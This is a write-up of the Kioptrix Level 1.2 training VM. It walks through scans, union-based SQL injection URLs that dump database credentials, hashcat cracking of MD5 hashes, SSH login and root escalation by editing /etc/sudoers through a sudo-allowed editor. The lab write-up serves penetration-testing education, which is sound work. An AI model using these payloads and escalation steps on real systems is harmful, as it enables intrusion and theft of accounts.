Lets continue the Kioptrix series with Kioptrix Level 1.2 #3
The Kioptrix series is aimed and beginners and thus are pretty easy challenges. The objective is getting root access to the vm via any means possible, except by hacking the actual vm client. The purpose of these vulnerable vm’s are to learn the basic techniques and tools used in penetration tests. There are more than one way of achieving the objective in this challenge.
The Kioptrix Level 1.1 VM can be downloaded from here. Note that it is an vmware image and can be used in vmware workstation or player. You can convert the image to be compatible with virtualbox.
## The Hack
The first step with every penetration test is intellegence gathering. This consists of passive / active recon and enumeration. Find out which services are running on the target server that are open to the world and which version they are using so that you can search for known vulnerabilities.
To achieve this we will be using a tool that will become the foundation of your pentesting toolkit. Nmap. nmap man page can be found here - it will explain all the options / flags / arguments usable with nmap.
apb@stratios:~$ nmap -vv --reason -sV -sC -Pn --min-rate=400 -T4 --script-timeout 10m -p- 192.168.163.134 Nmap scan report for 192.168.163.134 Host is up, received user-set (0.00025s latency). Not shown: 65533 closed ports Reason: 65533 conn-refused PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) | ssh-hostkey: | 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA) | ssh-dss AAAAB3NzaC1kc3MAAACBAL4CpDFXD9Zn2ONktcyGQL37Dn6s9JaOv3oKjxfdiABm9GjRkLEtbSAK3vhBBUJTZcVKYZk21lFHAqoe/+pLr4U9yOLOBbSoKNSxQ2VHN9FOLc9C58hKMF/0sjDsSIZnaI4zO7M4HmdEMYXONrmj2x6qczbfqecs+z4cEYVUF3R3AAAAFQCuG9mm7mLm1GGqZRSICZ+omMZkKQAAAIEAnj8NDH48hL+Pp06GWQZOlhte8JRZT5do6n8+bCgRSOvaYLYGoNi/GBzlET6tMSjWMsyhVY/YKTNTXRjqzS1DqbODM7M1GzLjsmGtVlkLoQafV6HJ25JsKPCEzSImjeOCpzwRP5opjmMrYBMjjKqtIlWYpaUijT4uR08tdaTxCukAAACBAJeJ9j2DTugDAy+SLCa0dZCH+jnclNo3o6oINF1FjzICdgDONL2YbBeU3CiAL2BureorAE0lturvvrIC2xVn2vHhrLpz6NPbDAkrLV2/rwoavbCkYGrwXdBHd5ObqBIkoUKbI1hGIGA51nafI2tjoXPfIeHeNOep20hgr32x9x1x | 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA) |_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAyOv6c+5ON+N+ZNDtjetiZ0eUxnIR1U0UqSF+a24Pz2xqdnJC1EN0O3zxGJB3gfPdJlyqUDiozbEth1GBP//8wbWsa1pLJOL1YmcumEJCsitngnrVN7huACG127UjKP8hArECjCHzc1P372gN3AQ/h5aZd0VV17e03HnAJ64ZziOQzVJ+DKWJbiHoXC2cdD1P+nlhK5fULe0QBvmA14gkl2LWA6KILHiisHZpF+V3X7NvXYyCSSI9GeXwhW4RKOCGdGVbjYf7d93K9gj0oU7dHrbdNKgX0WosuhMuXmKleHkIxfyLAILYWrRRj0GVdhZfbI99J3TYaR/yLTpb0D6mhw== 80/tcp open http syn-ack Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch |_http-title: Ligoat Security - Got Goat? Security ... Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel # Nmap done at Mon Feb 26 13:58:26 2018 -- 1 IP address (1 host up) scanned in 8.44 seconds
Only port 22 and 80 are open. Browse to the ip and lets see what is happening on port 80
They seem to be running LotusCMS. We can look for a version and see if there are known vulnerabilities. There is also a login page. aybe it’s vulnerable to sqli.
Let’s run a nikto quickly against the web server and see if it picks up anything.
- Nikto v2.1.6/2.1.5 + Target Host: 192.168.163.134 + Target Port: 80 + GET Cookie PHPSESSID created without the httponly flag + GET Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6 + GET The anti-clickjacking X-Frame-Options header is not present. + GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + GET Server leaks inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun 5 21:22:00 2009 + DUOJJMCX Web Server returns a valid response with junk HTTP methods, this may cause false positives. + OSVDB-877: TRACE HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-12184: GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: GET /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: GET /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-3092: GET /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. + OSVDB-3268: GET /icons/: Directory indexing found. + OSVDB-3233: GET /icons/README: Apache default file found. + GET /phpmyadmin/: phpMyAdmin directory found + OSVDB-3092: GET /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
After going through the nikto results we see they are running phpmyadmin. phpmyadmin is a web interface (lazy admins) to manage mysql databses.
Let’s see if we can access phpmyadmin.
Since we know they are running a CMS and phpmyadmin, which requires a sql backend, we can attempt a sqli.
…. and the injection is successfull..
Let’s snoop around and see what we can find out..
- Couple of minutes later*
After a quick look there doesn’t seem to be anything of value.
Let’s move on to the website / blog that’s running on the host.
On the website’s home page they seem to be going on about a new image gallery.. so after browsing through a couple of pages within the gallery and using their “sort function”, something caught my eye. In the url, “id=1”.
Full url: http://kioptrixtrix3.com/gallery/gallery.php?id=1&sort=dateuploaded#photos
It might be vulnerable to sqli. Let’s find out.
Modify the url to include a ‘ after the id=1
And we got a sql error which means that it is vulnerable to sqli. If there was no error, then the link would have been safe.
Next we need to try and figure out how many columns this table has.
We use the same url to query the database. sql query
order by 1 --
http://kioptrixtrix3.com/gallery/gallery.php?id=1 order by 1 --
If you don’t receive an error then carry on incrementing “order by 1” by 1 until you receive an error. When you reach an error page, then there are n-1 columns.
In this case, you will get a error at
http://kioptrixtrix3.com/gallery/gallery.php?id=1 order by 7 --
To determine the number of columns, it would be the error page number -1; n-1; which is 7 - 1, so this table has 6 columns.
Now that we know there are 6 columns, we need to determine which one is vulnerable.
We will use the “union select columns sequence” to find the vulnerable column in the table.
-1 union select 1,2,3,4,5,6 --
http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,2,3,4,5,6 --
Depending on the database, the above might not work, so give the following a try
http://kioptrixtrix3.com/gallery/gallery.php?id=-1 and 1=2 union select 1,2,3,4,5,6 --
It will show some numbers in the page, and it must be less than or equal to the number of columns.
Under “Sub Gallery” it is display 2 and 3. These could be our vulnerable points.
Let’s test and confirm.
Simple test would be to see if we can get the database version.
By using the “union select columns sequence” and replacing the 2 or 3 with “version()” or “@@version”.
http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,version(),3,4,5,6 --
http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,2,@@version,4,5,6 --
http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,@@version,version(),4,5,6 --
As we can see, it is using mysql 5.0.51a.
Let’s see which database and user the gallery is using.
http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,database(),user(),4,5,6 --
Database: gallery User: root
Next we have to find table names in the database. Replace the 2 or 3 with “group_concat(table_name)” and add “from information_schema.tables where table_schema=database()” at the end before the –
http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database() --
Now we have the tables stored in the database, and the dev_accounts looks the most promising.
Lets see if we can find out the columns within that table.
We need to make two changes to the statement.
First replace the “group_concat(table_name) with the “group_concat(column_name)”.
Then replace “from information_schema.tables where table_schema=database()” with “FROM information_schema.columns WHERE table_name=mysqlchar”
http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,group_concat(column_name),3,4,5,6 FROM information_schema.columns WHERE table_name=mysqlchar
Next we need to convert the table name to MysSQL CHAR() string to replace mysqlchar with.
I used the hackbar addon for firefox to achieve this. Once the bar is installed you can go SQL –> MySQL –> MYSQL CHAR().
A box will pop up where you enter the table name and it will convert it to CHAR.
CHAR(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115)
http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,group_concat(column_name),3,4,5,6 FROM information_schema.columns WHERE table_name=CHAR(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115)
Now we have the column names of the dev_accounts table and we are especially interested in the username and password columns.
Next we try and read the data stored in the username and password column.
Again a couple of changes to the sql statement.
Replace the “group_concat(column_name)” with “group_concat(columnname,0x3a,anothercolumnname)”
Replace the “from information_schema.columns where table_name=CHAR(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115)” with the “from table_name”
http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,group_concat(username,0x3a,password),3,4,5,6 FROM dev_accounts --
…. and there we have two usernames with their password hashes.
Lets see if we can crack the passwords.
Put the two hashes in a file.
apb@stratios:/tmp$ cat hashes.txt 0d3eccfb887aabd50f243b3f155c0f85 5badcaf789d3d1d09794d8f021f40f0e
Using hashcat with the rockyou.txt wordlist that came with kali.
apb@stratios:/tmp$ hashcat -m 0 hashes.txt --force /usr/share/wordlists/rockyou.txt hashcat (v4.0.1) starting... OpenCL Platform #1: The pocl project ==================================== * Device #1: pthread-Intel(R) Core(TM) i5-6300U CPU @ 2.40GHz, 1024/2944 MB allocatable, 2MCU Hashes: 2 digests; 2 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Applicable optimizers: * Zero-Byte * Early-Skip * Not-Salted * Not-Iterated * Single-Salt * Raw-Hash Password length minimum: 0 Password length maximum: 256 Dictionary cache built: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344392 * Bytes.....: 139921507 * Keyspace..: 14344385 * Runtime...: 2 secs - Device #1: autotuned kernel-accel to 1024 - Device #1: autotuned kernel-loops to 1 [s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => [s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => Session..........: hashcat Status...........: Running Hash.Type........: MD5 Hash.Target......: hashes.txt Time.Started.....: Tue Feb 27 12:09:20 2018 (0 secs) Time.Estimated...: Tue Feb 27 12:09:20 2018 (0 secs) Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.Dev.#1.....: 0 H/s (0.00ms) Recovered........: 0/2 (0.00%) Digests, 0/1 (0.00%) Salts Progress.........: 0/14344385 (0.00%) Rejected.........: 0/0 (0.00%) Restore.Point....: 0/14344385 (0.00%) Candidates.#1....: [Copying] HWMon.Dev.#1.....: N/A 5badcaf789d3d1d09794d8f021f40f0e:starwars 0d3eccfb887aabd50f243b3f155c0f85:Mast3r Session..........: hashcat Status...........: Cracked Hash.Type........: MD5 Hash.Target......: hashes.txt Time.Started.....: Tue Feb 27 12:09:20 2018 (5 secs) Time.Estimated...: Tue Feb 27 12:09:25 2018 (0 secs) Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.Dev.#1.....: 2198.2 kH/s (0.66ms) Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts Progress.........: 10835968/14344385 (75.54%) Rejected.........: 0/10835968 (0.00%) Restore.Point....: 10833920/14344385 (75.53%) Candidates.#1....: MasterFlick -> MarkBryan98 HWMon.Dev.#1.....: N/A Started: Tue Feb 27 12:08:52 2018 Stopped: Tue Feb 27 12:09:26 2018
And there are our passwords.
Now we can try and ssh into the server with the above credentials.
apb@stratios:~$ ssh email@example.com firstname.lastname@example.org's password: Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. To access official Ubuntu documentation, please visit: http://help.ubuntu.com/ Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106 loneferret@Kioptrix3:~$ ls checksec.sh CompanyPolicy.README loneferret@Kioptrix3:~$ cat CompanyPolicy.README Hello new employee, It is company policy here to use our newly installed software for editing, creating and viewing files. Please use the command 'sudo ht'. Failure to do so will result in you immediate termination. DG CEO
Let’s see what we are allowed to run with sudo
loneferret@Kioptrix3:~$ sudo -l User loneferret may run the following commands on this host: (root) NOPASSWD: !/usr/bin/su (root) NOPASSWD: /usr/local/bin/ht
So we can edit files using this “ht” program. Let’s see if we can edit the /etc/sudoers file and give ourselves permission to su to root
loneferret@Kioptrix3:~$ sudo ht /etc/sudoers
… my. poor. eyes…
Press ALT + F to open the FIle Menu and select Open
Once the file is open, add the following:
loneferret ALL=(ALL) ALL
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
Save and quit the file.
Now try to sudo su -
loneferret@Kioptrix3:~$ sudo su - root@Kioptrix3:~#
And there we have root access to the target machine.
This one was defenitely more challenging than the first two. Had to read up quite a bit for the sqli queries. But this is how one learns and you cannot beat the satasfactory feeling of solving a problem.